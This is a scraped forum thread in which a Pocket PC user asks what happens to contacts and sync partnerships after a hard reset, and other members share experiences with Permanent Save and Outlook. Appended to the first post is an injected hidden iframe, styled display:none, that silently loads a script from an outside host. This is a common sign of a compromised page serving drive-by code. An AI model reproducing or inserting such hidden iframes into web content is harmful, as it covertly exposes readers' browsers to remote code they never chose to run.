What happens to Contacts when you Hard Reset?

Hello all,

I want to do a hard reset to clear out all the trial software I've been playing with. However, I'm worried about losing my contacts.

A couple of things you should know:
I don't synchronise with Outlook
I have enabled the Permanent save function, and this works every time I soft reset.
I can do an up-to-date SD backup onto my storage card, but don't know if just restoring the contacts from this is an option.

Can anyone who has done a hard reset tell me what happened to their contacts before they synchronised back up with their PC? I'd also be interested to know what happens to your partnership, do you have to create a new one?

rgds and Merry Christmas,
Alex.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Now I haven't done this since I updated the ROM in my T-Mobile PPC PE, but I had permanent save set up and after a hard reset, the contacts came back. But I personally would not rely just on the permanent save, I really recommend having your contacts somewhere else.

And no, you can't just restore the contacts from an SD backup.

Do you sync to anything?

I have done hard resets over my use of Pocket PCs a number of times... usually for the reason you mentioned. I do sync with Outlook, and that's the way I recover my contacts. It works very well. Since you don't use Outlook, do you sync to something else? If not, perhaps it would be worth loading Outlook as a backup mechanism. Its on the CD that came with the phone. Its also pretty handy for doing quick entry of your contacts. If you sync to something else, then that might also be an alternative for backing up.

As for the partnerships, I've always had to create a new one after a hard reset... kind of a pain. This is one of many things that I wish Microsoft would fix.

So, do you use something else for syncing?

Thanks for your answers - I did what you suggested and installed Outlook as a backup just in case, but the permanent save worked fine - you have to go to the program and reselect the tick box once the PPC returns, it then does the restore and you get all your contacts back! Hurrah.

The reason I didn't have Outlook (I can hear you all saying "That's strange, no Outlook"!) is I never used it before I got the xda. At work, I don't have access to the email server as I'm supposed to be a contractor (tax regulations!). At home, I'm an Outlook Express user who cannot do without the inbox filters! I have since realised that Outlook 2002 has this facility now, so I may upgrade at home as well. I wonder if it's ok under Win98?

I have started doing a list for all the things I have lost/would have lost had they not been backed up. I think it would be useful for people to have a check list to make sure they cover their bases before doing resets, so will type this up over the christmas/new year lull.

In the mean time, Happy Christmas, spread joy whenever you can.

rgds,
Alex.

Please submit and FAQ when you get it typed up...

Adesalis,

When you get that typed up, please submit it as an FAQ. One thing to keep in mind is that you will be able to edit the FAQ once you submit it... so even if you have partial information ... feel free to enter that, and update it when you can.
